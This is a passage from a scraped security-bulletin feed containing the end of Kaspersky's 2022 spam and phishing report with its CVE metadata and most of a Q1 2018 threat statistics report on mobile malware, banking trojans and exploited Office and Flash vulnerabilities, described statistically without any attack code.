infamous [Emotet](<https://securelist.com/emotet-modules-and-recent-attacks/106290/>) botnet (2.52%). Law enforcement shut this down in early 2021, but by fall, attackers had restored the infrastructure and were actively distributing it in 2022. More recently, Emotet has been used to deliver other malware to victims' devices, particularly ransomware. The ninth most popular family was [Taskun](<https://threats.kaspersky.com/en/threat/Trojan.MSIL.Taskun/>) (2.10%), which creates malicious tasks in the task scheduler.\n\n_TOP 10 types of malware spread by email attachments in 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161339/07-en-spam-report-2022-diagrams.png>))_\n\nThe list of the most common malware sent via email usually corresponds to the list of families. As in 2021, attackers mostly distributed the same instances from the TOP 10 families.\n\n### Countries and territories targeted by malicious mailings\n\nSpain remains the leader in terms of blocked malicious attachments in 2022 (8.78%), which is a slight decrease compared to 2021 (9.32%). The share of Russia (7.29%), on the other hand, increased slightly. Third place went to Mexico (6.73%), and fourth place to Brazil (4.81%), whose share was virtually unchanged from the previous reporting period.\n\n_TOP 20 countries and territories targeted by malicious mailings, 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161409/08-en-spam-report-2022-diagrams.png>))_\n\nIn Italy, 4.76% of all detected malicious attachments were blocked in 2022. The country is followed by Vietnam (4.43%) and Turkey (4.31%). The percentage of Mail Anti-Virus detections on computers of users from Germany (3.85%) continued to decrease. The share in the United Arab Emirates (3.41%) also decreased slightly, dropping to ninth place, while Malaysia (2.98%) remained in tenth place.\n\n## Statistics: phishing\n\nIn 2022, the number of phishing attacks increased markedly. Our Anti-Phishing system prevented 507,851,735 attempts to follow a phishing link, roughly double the number in 2021.\n\n### Map of phishing attacks\n\nIn 2022, the geography of phishing attacks changed dramatically. Attempts to click phishing links were most often blocked on devices from Vietnam (17.03%). In 2021, this country was not among the TOP 10 most attacked countries and territories. Macau is in second place (13.88%), also absent from last year's ranking. Madagascar is in third place (12.04%), which was seventh in 2021. In addition to Vietnam and Macau, Algeria (11.05%), Malawi (10.91%) and Morocco (10.43%) appeared at the top of the list of most attacked countries and territories. Ecuador (11.05%) moved up to fifth place, while Brunei (10.59%) dropped one place to seventh. Brazil (10.57%) and Portugal (10.33%) moved from first and third places to eighth and tenth, respectively, and France, which was second in 2021, left the TOP 10.\n\nTOP 10 countries and territories by share of attacked users:\n\n**Country/territory** | **Share of attacked users*** \n---|--- \nVietnam | 17.03% \nMacau | 13.88% \nMadagascar | 12.04% \nAlgeria | 11.05% \nEcuador | 11.05% \nMalawi | 10.91% \nBrunei | 10.59% \nBrazil | 10.57% \nMorocco | 10.43% \nPortugal | 10.33% \n \n**_* Share of users encountering phishing out of the total number of Kaspersky users in that country/territory, 2022_**\n\n### Top-level domains\n\nAs in previous years, the majority of phishing pages were hosted in the COM domain zone, but its share almost halved, from 31.55% to 17.69%. Zone XYZ remained in second place (8.79%), whose share also decreased. The third most popular domain among attackers was FUN (7.85%), which had not previously received their attention. The domain is associated with entertainment content, which is perhaps what attracted fraudsters to it.\n\n_Most frequent top-level domains for phishing pages in 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161441/09-en-spam-report-2022-diagrams.png>))_\n\nDomains ORG (3.89%) and TOP (1.80%) swapped places relative to 2021 but remained in fourth and fifth places. In addition to this, the top ten domain zones in most demand among cybercriminals included: RU (1.52%), COM.BR (1.13), DE (0.98%), CO.UK (0.98%) and SE (0.92%).\n\n### Organizations under phishing attacks\n\n_The rating of organizations targeted by phishers is based on the triggering of the deterministic component in the Anti-Phishing system on user computers. The component detects all pages with phishing content that the user has tried to open by following a link in an email message or on the web, as long as links to these pages are present in the Kaspersky database._\n\nIn 2022, pages impersonating delivery services had the highest percentage of clicks on phishing links blocked by our solutions (27.38%). Online stores (15.56%), which were popular with attackers during the pandemic, occupied second place. Payment systems (10.39%) and banks (10.39%) ranked third and fourth, respectively.\n\n_Distribution of organizations targeted by phishers, by category, 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161508/10-en-spam-report-2022-diagrams.png>))_\n\nThe share of global internet portals (8.97%) almost halved, with almost as many phishing resources targeting users of smaller web services (8.24%). Social networks (6.83%), online games (2.84%), messengers (2.02%) and financial services (1.94%) round complete the TOP 10 categories of sites of interest to criminals.\n\n### Hijacking Telegram accounts\n\nIn 2022, our solutions stopped 378,496 phishing links aimed at hijacking Telegram accounts. Apart from a spike in phishing activity throughout June, when the number of blocked links exceeded 37,000, the first three quarters were relatively quiet. However, by the end of the year, the number of phishing attacks on the messenger's users increased dramatically to 44,700 in October, 83,100 in November and 125,000 in December. This increase is most likely due to several large-scale Telegram account hijacking campaigns that we [observed in late 2022](<https://www.kaspersky.ru/blog/telegram-takeover-contest/34472/>) (article in Russian).\n\n_Number of clicks on phishing links aimed at hijacking a Telegram account worldwide, and in Russia specifically, January \u2014 December 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161540/11-en-spam-report-2022-diagrams.png>))_\n\nIt is of note that the majority of phishing attacks were aimed at users from Russia. While in the first months of 2022 their share was approximately half of the total number of attacks worldwide, since March 70\u201390% of all attempts to follow phishing links by Telegram users were made by Russian users.\n\n### Phishing in messengers\n\n_Statistics on messenger-based phishing are based on anonymized data from the Safe Messaging component of Kaspersky Internet Security for Android, voluntarily provided by users of this solution. Safe Messaging scans incoming messages and blocks attempts to follow any phishing or otherwise malicious links in them._\n\nIn 2022, our mobile solution blocked 360,185 attempts to click on phishing links from messengers. Of these, 82.71% came from WhatsApp, 14.12% from Telegram and another 3.17% from Viber.\n\n_Distribution of links blocked by the Safe Messaging component, by messenger, 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161612/12-en-spam-report-2022-diagrams.png>))_\n\nPhishing activity on WhatsApp is down slightly since 2021. On average, the Safe Messaging component blocked 816 clicks on fraudulent links per day. The first half of the year was the most turbulent, and by the third quarter, phishing activity in the messenger had dropped sharply.\n\n[![Dynamics of phishing activity on WhatsApp in 2022 \$weekly number of detected links shown\$](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13154605/spam-phishing-report-2022-42.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13154605/spam-phishing-report-2022-42.png>)\n\n**_Dynamics of phishing activity on WhatsApp in 2022 (weekly number of detected links shown)_**\n\nThe largest number of phishing attempts on WhatsApp, approximately 76,000, was recorded in Brazil. Russia is in second place, where over the year, the Chat Protection component prevented 69,000 attempts to go to fraudulent resources from the messenger.\n\n_TOP 7 countries and territories where users most often clicked phishing links in WhatsApp ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161647/13-en-spam-report-2022-diagrams.png>))_\n\nUnlike WhatsApp, the number of phishing attacks on Telegram almost tripled in 2022 compared to the previous reporting period. On average, our solutions blocked 140 attempts to follow phishing links in this messenger per day. The peak of activity came at the end of June and beginning of July, when the number of blocked clicks could have exceeded 1,500 per week. Phishing activity on Telegram also increased sharply at the end of the year.\n\n[![Dynamics of phishing activity on Telegram in 2022 \$weekly number of detected links shown\$](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13154645/spam-phishing-report-2022-41.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13154645/spam-phishing-report-2022-41.png>)\n\n**_Dynamics of phishing activity on Telegram in 2022 (weekly number of detected links shown)_**\n\nIn Russia, we recorded the largest number (21,000) of attempts to click a link to fraudulent resources from Telegram. Second place went to Brazil, where 3,800 clicks were blocked.\n\n_TOP 7 countries and territories where users most frequently clicked phishing links from Telegram ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161717/14-en-spam-report-2022-diagrams.png>))_\n\n## Conclusion\n\nTimes of crisis create the preconditions for crime to flourish, including online. Scams promising compensation and payouts from government agencies, large corporations and banks are likely to remain popular among cybercriminals next year. The unpredictability of the currency market and departure of individual companies from specific countries' markets will likely affect the number of scams associated with online shopping. At the same time, the COVID-19 topic, popular with cybercriminals in 2020 and 2021, but already beginning to wane in 2022, will finally cease to be relevant and will be replaced by more pressing global issues.\n\nRecently, we've seen an increase in targeted phishing attacks where scammers don't immediately move on to the phishing attack itself, but only after several introductory emails where there is active correspondence with the victim. This trend is likely to continue. New tricks are also likely to emerge in the corporate sector in 2023, with attacks generating significant profits for attackers.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2023-02-16T08:00:07", "type": "securelist", "title": "Spam and phishing in 2022", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882", "CVE-2018-0802"], "modified": "2023-02-16T08:00:07", "id": "SECURELIST:49E48EDB41EB48E2FCD169A511E8AACD", "href": "https://securelist.com/spam-phishing-scam-report-2022/108692/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-05-15T21:13:49", "description": "![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2014/08/08080813/quarter_threat.jpg)\n\n## Q1 figures\n\nAccording to KSN: \n\n * Kaspersky Lab solutions blocked 796,806,112 attacks launched from online resources located in 194 countries across the globe.\n * 282,807,433 unique URLs were recognized as malicious by Web Anti-Virus components.\n * Attempted infections by malware designed to steal money via online access to bank accounts were logged on the computers of 204,448 users.\n * Ransomware attacks were registered on the computers of 179,934 unique users.\n * Our File Anti-Virus logged 187,597,494 unique malicious and potentially unwanted objects.\n * Kaspersky Lab products for mobile devices detected: \n * 1,322,578 malicious installation packages\n * 18,912 installation packages for mobile banking Trojans\n * 8,787 installation packages for mobile ransomware Trojans\n\n## Mobile threats\n\n### Q1 events\n\nIn Q1 2018, DNS-hijacking, a new in-the-wild method for spreading mobile malware on Android devices, was identified. As a result of hacked routers and modified DNS settings, users were redirected to IP addresses belonging to the cybercriminals, where they were prompted to download malware disguised, for example, as browser updates. That is how the Korean banking Trojan Wroba was [distributed](<https://securelist.com/roaming-mantis-uses-dns-hijacking-to-infect-android-smartphones/85178/>).\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171226/180511-it-threats-q1-18-statistics-1.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171226/180511-it-threats-q1-18-statistics-1.png>)\n\n_This malicious resource shows a fake window while displaying the legitimate site in the address bar_\n\nIt wasn't a [drive-by-download](<https://securelist.com/threats/drive-by-attack-glossary/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) case, since the success of the attack largely depended on actions by the victim, such as installing and running the Trojan. But it's interesting to note that some devices (routers) were used to attack other devices (smartphones), all sprinkled with social engineering to make it more effective.\n\nHowever, a far greater splash in Q1 was caused by the creators of a seemingly legitimate app called GetContact.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171508/180511-it-threats-q1-18-statistics-21.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171508/180511-it-threats-q1-18-statistics-21.png>)\n\nSome backstory to begin with. Various families and classes of malicious apps are known to gather data from infected devices: it could be a relatively harmless IMEI number, phone book contents, SMS correspondence, or even WhatsApp chats. All the above (and much more besides) is personal information that only the mobile phone owner should have control over. However, the creators of GetContact concocted a license agreement giving them the right to download the user's phone book to their servers and grant all their subscribers access to it. As a result, anyone could find out what name GetContact users had saved their phone number under, often with sad consequences. Let's hope that the app creators had the noble intention of [protecting users from telephone spam and fraudulent calls](<https://callerid.kaspersky.com/?lang=ru>), but simply chose the wrong means to do so.\n\n### Mobile threat statistics\n\nIn Q1 2018, Kaspersky Lab detected 1,322,578 malicious installation packages, down 11% against the previous quarter.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171235/180511-it-threats-q1-18-statistics-4.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171235/180511-it-threats-q1-18-statistics-4.png>)\n\n_Number of detected malicious installation packages, Q2 2017 \u2013 Q1 2018_\n\n#### Distribution of detected mobile apps by type\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171244/180511-it-threats-q1-18-statistics-5.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171244/180511-it-threats-q1-18-statistics-5.png>)\n\n_Distribution of newly detected mobile apps by type, Q4 2017 and Q1 2018 _\n\nAmong all the threats detected in Q1 2018, the lion's share belonged to potentially unwanted RiskTool apps (49.3%); compared to the previous quarter, their share fell by 5.5%. Members of the RiskTool.AndroidOS.SMSreg family contributed most to this indicator.\n\nSecond place was taken by Trojan-Dropper threats (21%), whose share doubled. Most detected files of this type came from the Trojan-Dropper.AndroidOS.Piom family.\n\nAdvertising apps, which ranked second in Q4 2017, dropped a place\u2014their share decreased by 8%, accounting for 11% of all detected threats.\n\nOn a separate note, Q1 saw a rise in the share of mobile banking threats. This was due to the mass distribution of Trojan-Banker.AndroidOS.Faketoken.z.\n\n#### TOP 20 mobile malware\n\n_Note that this malware rating does not include potentially dangerous or unwanted programs such as RiskTool and Adware._\n\n | Verdict | %* \n---|---|--- \n1 | DangerousObject.Multi.Generic | 70.17 \n2 | Trojan.AndroidOS.Boogr.gsh | 12.92 \n3 | Trojan.AndroidOS.Agent.rx | 5.55 \n4 | Trojan-Dropper.AndroidOS.Lezok.p | 5.23 \n5 | Trojan-Dropper.AndroidOS.Hqwar.ba | 2.95 \n6 | Trojan.AndroidOS.Triada.dl | 2.94 \n7 | Trojan-Dropper.AndroidOS.Hqwar.i | 2.51 \n8 | Trojan.AndroidOS.Piom.rfw | 2.13 \n9 | Trojan-Dropper.AndroidOS.Lezok.t | 2.06 \n10 | Trojan.AndroidOS.Piom.pnl | 1.78 \n11 | Trojan-Dropper.AndroidOS.Agent.ii | 1.76 \n12 | Trojan-SMS.AndroidOS.FakeInst.ei | 1.64 \n13 | Trojan-Dropper.AndroidOS.Hqwar.gen | 1.50 \n14 | Trojan-Ransom.AndroidOS.Zebt.a | 1.48 \n15 | Trojan.AndroidOS.Piom.qmx | 1.47 \n16 | Trojan.AndroidOS.Dvmap.a | 1.40 \n17 | Trojan-SMS.AndroidOS.Agent.xk | 1.35 \n18 | Trojan.AndroidOS.Triada.snt | 1.24 \n19 | Trojan-Dropper.AndroidOS.Lezok.b | 1.22 \n20 | Trojan-Dropper.AndroidOS.Tiny.d | 1.22 \n \n_* Unique users attacked by the relevant malware as a percentage of all users of Kaspersky Lab's mobile antivirus that were attacked._\n\nAs before, first place in our TOP 20 went to DangerousObject.Multi.Generic (70.17%), the verdict we use for malware detected [using cloud technologies](<https://www.kaspersky.com/enterprise-security/wiki-section/products/big-data-the-astraea-technology>). Cloud technologies work when the anti-virus databases lack data for detecting a piece of malware, but the cloud of the anti-virus company already contains information about the object. This is basically how the latest malicious programs are detected.\n\nIn second place was Trojan.AndroidOS.Boogr.gsh (12.92%). This verdict is given to files recognized as malicious by our system based on [machine learning](<https://www.kaspersky.com/enterprise-security/wiki-section/products/machine-learning-in-cybersecurity>).\n\nThird was Trojan.AndroidOS.Agent.rx (5.55%). Operating in background mode, this Trojan's task is to covertly visit web pages as instructed by its C&C.\n\nFourth and fifth places went to the Trojan _matryoshkas_ Trojan-Dropper.AndroidOS.Lezok.p (5.2%) and Trojan-Dropper.AndroidOS.Hqwar.ba (2.95%), respectively. Note that in Q1 threats like Trojan-Dropper effectively owned the TOP 20, occupying eight positions in the rating. The main tasks of such droppers are to drop a payload on the victim, avoid detection by security software, and complicate the reverse engineering process. In the case of Lezok, an aggressive advertising app acts as the payload, while Hqwar can conceal a banking Trojan or ransomware.\n\nSixth place in the rating was taken by the unusual Trojan Triada.dl (2.94%) from the [Trojan.AndroidOS.Triada](<https://threats.kaspersky.com/en/threat/Trojan.AndroidOS.Triada/>) family of modular-designed malware, which we have written about many times. The Trojan was notable for its highly sophisticated attack vector: it modified the main system library libandroid_runtime.so so that malicious code started when any debugging output was written to the system event log. Devices with the modified library ended up on store shelves, thus ensuring that the infection began early. The capabilities of Triada.dl are almost limitless: it can be embedded in apps already installed and pinch data from them, and it can show the user fake data in \"clean\" apps.\n\nThe Trojan ransomware Trojan-Trojan-Ransom.AndroidOS.Zebt.a (1.48%) finished 14th. It features a quaint set of functions, including hiding the icon at startup and requesting device administrator rights to counteract deletion. Like other such mobile ransomware, the malware is distributed under the guise of a porn app.\n\nAnother interesting resident in the TOP 20 is Trojan-SMS.AndroidOS.Agent.xk (1.35%), which operates like the SMS Trojans of 2011. The malware displays a welcome screen offering various services, generally access to content. At the bottom in fine print it is written that the services are fee-based and subscription to them is via SMS.\n\n#### Geography of mobile threats\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171253/180511-it-threats-q1-18-statistics-6.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171253/180511-it-threats-q1-18-statistics-6.png>)\n\n_Map of attempted infections using mobile malware in Q1 2018 (percentage of attacked users in the country)_\n\nTOP 10 countries by share of users attacked by mobile malware:\n\n | Country* | %** \n---|---|--- \n1 | China | 34.43 \n2 | Bangladesh | 27.53 \n3 | Nepal | 27.37 \n4 | Ivory Coast | 27.16 \n5 | Nigeria | 25.36 \n6 | Algeria | 24.13 \n7 | Tanzania | 23.61 \n8 | India | 23.27 \n9 | Indonesia | 22.01 \n10 | Kenya | 21.45 \n \n_* Excluded from the rating are countries with relatively few users of Kaspersky Lab's mobile antivirus (under 10,000). \n** Unique users attacked in the country as a percentage of all users of Kaspersky Lab's mobile antivirus in the country._\n\nIn Q1 2018, China (34.43%) topped the list by share of mobile users attacked. Note that China is a regular fixture in the TOP 10 rating by number of attacked users: It came sixth in 2017, and fourth in 2016. As in 2017, second place was claimed by Bangladesh (27.53%). The biggest climber was Nepal (27.37%), rising from ninth place last year to third.\n\nRussia (8.18%) this quarter was down in 39th spot, behind Qatar (8.22%) and Vietnam (8.48%).\n\nThe safest countries (based on proportion of mobile users attacked) are Denmark (1.85%) and Japan (1%).\n\n#### Mobile banking Trojans\n\nIn the reporting period, we detected **18,912** installation packages for mobile banking Trojans, which is 1.3 times more than in Q4 2017.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171304/180511-it-threats-q1-18-statistics-7.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171304/180511-it-threats-q1-18-statistics-7.png>)\n\n_Number of installation packages for mobile banking Trojans detected by Kaspersky Lab, Q2 2017 \u2013 Q1 2018_\n\n| Verdict | %* \n---|---|--- \n1 | Trojan-Banker.AndroidOS.Asacub.bj | 12.36 \n2 | Trojan-Banker.AndroidOS.Svpeng.q | 9.17 \n3 | Trojan-Banker.AndroidOS.Asacub.bk | 7.82 \n4 | Trojan-Banker.AndroidOS.Svpeng.aj | 6.63 \n5 | Trojan-Banker.AndroidOS.Asacub.e | 5.93 \n6 | Trojan-Banker.AndroidOS.Hqwar.t | 5.38 \n7 | Trojan-Banker.AndroidOS.Faketoken.z | 5.15 \n8 | Trojan-Banker.AndroidOS.Svpeng.ai | 4.54 \n9 | Trojan-Banker.AndroidOS.Agent.di | 4.31 \n10 | Trojan-Banker.AndroidOS.Asacub.ar | 3.52 \n \n_* Unique users attacked by the relevant malware as a percentage of all users of Kaspersky Lab's mobile antivirus that were attacked by banking threats._\n\nThe most popular mobile banking Trojan in Q1 was Asacub.bj (12.36%), nudging ahead of second-place Svpeng.q (9.17%). Both these Trojans use phishing windows to steal bank card and authentication data for online banking. They also steal money through SMS services, including mobile banking.\n\nNote that the TOP 10 mobile banking threats in Q1 is largely made up of members of the Asacub (4 out of 10) and Svpeng (3 out of 10) families. However, Trojan-Banker.AndroidOS.Faketoken.z also entered the list. This Trojan has extensive spy capabilities: it can install other apps, intercept incoming messages (or create them on command), make calls and USSD requests, and, of course, open links to phishing pages.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171313/180511-it-threats-q1-18-statistics-8.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171313/180511-it-threats-q1-18-statistics-8.png>)\n\n_Geography of mobile banking threats in Q1 2018 (percentage of attacked users)_\n\n**TOP 10 countries by share of users attacked by mobile banking Trojans**\n\n | Country* | %** \n---|---|--- \n1 | Russia | 0.74 \n2 | USA | 0.65 \n3 | Tajikistan | 0.31 \n4 | Uzbekistan | 0.30 \n5 | China | 0.26 \n6 | Turkey | 0.22 \n7 | Ukraine | 0.22 \n8 | Kazakhstan | 0.22 \n9 | Poland | 0.17 \n10 | Moldova | 0.16 \n \n_* Excluded from the rating are countries with relatively few users of Kaspersky Lab's mobile antivirus (under 10,000). \n** Unique users attacked by mobile banking Trojans in the country as a percentage of all users of Kaspersky Lab's mobile antivirus in this country._\n\nThe Q1 2018 rating was much the same as the situation observed throughout 2017: Russia (0.74%) remained top.\n\nThe US (0.65%) and Tajikistan (0.31%) took silver and bronze, respectively. The most popular mobile banking Trojans in these countries were various modifications of the [Trojan-Banker.AndroidOS.Svpeng](<https://securelist.com/latest-version-of-svpeng-targets-users-in-us/63746/>) family, as well Trojan-Banker.AndroidOS.Faketoken.z.\n\n#### Mobile ransomware Trojans\n\nIn Q1 2018, we detected **8,787** installation packages for mobile ransomware Trojans, which is just over half the amount seen in the previous quarter and 22 times less than in Q2 2017. This significant drop is largely because attackers began to make more use of droppers in an attempt to hinder detection and hide the payload. As a result, such malware is detected as a dropper (for example, from the Trojan-Dropper.AndroidOS.Hqwar family), even though it may contain mobile ransomware or a \"banker.\"\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171322/180511-it-threats-q1-18-statistics-9.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171322/180511-it-threats-q1-18-statistics-9.png>)\n\n_Number of installation packages for mobile ransomware Trojans detected by Kaspersky Lab (Q2 2017 \u2013 Q1 2018)_\n\nNote that despite the decline in their total number, ransomware Trojans remain a serious threat \u2014 technically they are now far more advanced and dangerous. For instance, Trojan-Trojan-Ransom.AndroidOS.Svpeng acquires device administrator rights and locks the smartphone screen with a PIN if an attempt is made to remove them. If no PIN is set (could also be a graphic, numeric, or biometric lock), the device is locked. In this case, the only way to restore the smartphone to working order is to reset the factory settings.\n\nThe most widespread mobile ransomware in Q1 was Trojan-Ransom.AndroidOS.Zebt.a \u2014 it was encountered by more than half of all users. In second place was Trojan-Ransom.AndroidOS.Fusob.h, having held pole position for a long time. The once popular Trojan-Ransom.AndroidOS.Svpeng.ab only managed fifth place, behind Trojan-Ransom.AndroidOS.Egat.d and Trojan-Ransom.AndroidOS.Small.snt. Incidentally, Egat.d is a pared-down version of Zebt.a, both have the same creators.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171331/180511-it-threats-q1-18-statistics-10.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171331/180511-it-threats-q1-18-statistics-10.png>)\n\n_Geography of mobile ransomware Trojans in Q1 2018 (percentage of attacked users)_\n\nTOP 10 countries by share of users attacked by mobile ransomware Trojans:\n\n | Country* | %** \n---|---|--- \n1 | Kazakhstan | 0.99 \n2 | Italy | 0.64 \n3 | Ireland | 0.63 \n4 | Poland | 0.61 \n5 | Belgium | 0.56 \n6 | Austria | 0.38 \n7 | Romania | 0.37 \n8 | Hungary | 0.34 \n9 | Germany | 0.33 \n10 | Switzerland | 0.29 \n \n_* Excluded from the rating are countries where the number of users of Kaspersky Lab's mobile antivirus is relatively small (fewer than 10,000) \n** Unique users in the country attacked by mobile ransomware Trojans as a percentage of all users of Kaspersky Lab's mobile antivirus in the country._\n\nFirst place in the TOP 10 again went to Kazakhstan (0.99%); the most active family in this country was Trojan-Ransom.AndroidOS.Small. Second came Italy (0.64%), where most attacks were the work of Trojan-Ransom.AndroidOS.Zebt.a, which is also the most popular mobile ransomware in third-place Ireland (0.63%).\n\n## Vulnerable apps used by cybercriminals\n\nIn Q1 2018, we observed some major changes in the distribution of exploits launched against users. The share of Microsoft Office exploits (47.15%) more than doubled compared with the average for 2017. This is also twice the quarterly score of the permanent leader in recent years \u2014 browser exploits (23.47%). The reason behind the sharp increase is clear: over the past year, so many different vulnerabilities have been found and exploited in Office applications, that it can only be compared to amount of Adobe Flash vulnerabilities found in the past. But lately the share of Flash exploits has been decreasing (2.57% in Q1), since Adobe and Microsoft are doing all they can to hinder the exploitation of Flash Player.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171341/180511-it-threats-q1-18-statistics-11.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171341/180511-it-threats-q1-18-statistics-11.png>)\n\n_Distribution of exploits used in attacks by type of application attacked, Q1 2018_\n\nThe most frequently used vulnerability in Microsoft Office in Q1 was [CVE-2017-11882](<https://threats.kaspersky.com/en/vulnerability/KLA11139/>) \u2014 a stack overflow-type vulnerability in Equation Editor, a rather old component in the Office suite. Attacks using this vulnerability make up approximately one-sixth of all exploit-based attacks. This is presumably because CVE-2017-11882 exploitation is fairly reliable. Plus, the bytecode processed by Equation Editor allows the use of various obfuscations, which increases the chances of bypassing the protection and launching a successful attack (Kaspersky Lab's Equation file format parser easily handles all currently known obfuscations). Another vulnerability found in Equation Editor this quarter was CVE-2018-0802. It too is exploited, but less actively. The following exploits for logical vulnerabilities in Office found in 2017 were also encountered: CVE-2017-8570, CVE-2017-8759, CVE-2017-0199. But even their combined number of attacks does not rival CVE-2017-11882.\n\nAs for zero-day exploits in Q1, CVE-2018-4878 was reported by a South Korean CERT and several other sources in late January. This is an Adobe Flash vulnerability originally used in targeted attacks (supposedly by the Scarcruft group). At the end of the quarter, an exploit for it appeared in the widespread GreenFlash Sundown, Magnitude, and RIG exploit kits. In targeted attacks, a Flash object with the exploit was embedded in a Word document, while exploit kits distribute it via web pages.\n\nLarge-scale use of network exploits using vulnerabilities patched by the MS17-010 update (those that exploited [EternalBlue](<https://threats.kaspersky.com/en/vulnerability/KLA10977/>) and other vulnerabilities from the Shadow Brokers leak) also continued throughout the quarter. MS17-010 exploits account for more than 25% of all network attacks that we registered.\n\n## Malicious programs online (attacks via web resources)\n\n_The statistics in this chapter are based on Web Anti-Virus, which protects users when malicious objects are downloaded from malicious/infected web pages. Malicious websites are specially created by cybercriminals; web resources with user-created content (for example, forums), as well as hacked legitimate resources, can be infected. _\n\n### **Online threats in the financial sector**\n\n#### Q1 events\n\nIn early 2018, the owners of the Trojan Dridex were particularly active. Throughout its years-long existence, this malware has acquired a solid infrastructure. Today, its main line of activity is compromising credentials for online banking services with subsequent theft of funds from bank accounts. Its accomplice is fellow banking Trojan Emotet. Discovered in 2014, this malware also belongs to a new breed of banking Trojans developed from scratch. However, it was located on the same network infrastructure as Dridex, suggesting a close link between the two families. But now Emotet has lost its banking functions and is used by attackers as a spam bot and loader with Dridex as the payload. Early this year, it was reported that the encryptor BitPaymer (discovered last year) was developed by the same group behind [Dridex](<https://securelist.com/dridex-a-history-of-evolution/78531/>). As a result, the malware was rebranded FriedEx.\n\nQ1 saw the arrest of the head of the criminal group responsible for the Carbanak and Cobalt malware attacks, it was [reported by Europol](<https://www.europol.europa.eu/newsroom/news/mastermind-behind-eur-1-billion-cyber-bank-robbery-arrested-in-spain>). Starting in 2013, the criminal group attacked more than 40 organizations, causing damage to the financial industry estimated at more than EUR 1 billion. The main attack vector was to penetrate the target organization's network by sending employees spear-phishing messages with malicious attachments. Having penetrated the internal network via the infected computers, the cybercriminals gained access to the ATM control servers, and through them to the ATMs themselves. Access to the infrastructure, servers, and ATMs allowed the cybercriminals to dispense cash without the use of bank cards, transfer money from the organisation to criminal accounts, and inflate bank balances with money mules being used to collect the proceeds.\n\n#### Financial threat statistics\n\n_These statistics are based on detection verdicts of Kaspersky Lab products received from users who consented to provide statistical data. As of Q1 2017, the statistics include malicious programs for ATMs and POS terminals, but do not include mobile threats._\n\nIn Q1 2018, Kaspersky Lab solutions blocked attempts to launch one or more malicious programs designed to steal money from bank accounts on the computers of 204,448 users.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171350/180511-it-threats-q1-18-statistics-12.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171350/180511-it-threats-q1-18-statistics-12.png>)\n\n_Number of unique users attacked by financial malware, Q1 2018_\n\n##### Geography of attacks\n\nTo evaluate and compare the risk of being infected by banking Trojans and ATM/POS malware worldwide, for each country we calculated the share of users of Kaspersky Lab products that faced this threat during the reporting period out of all users of our products in that 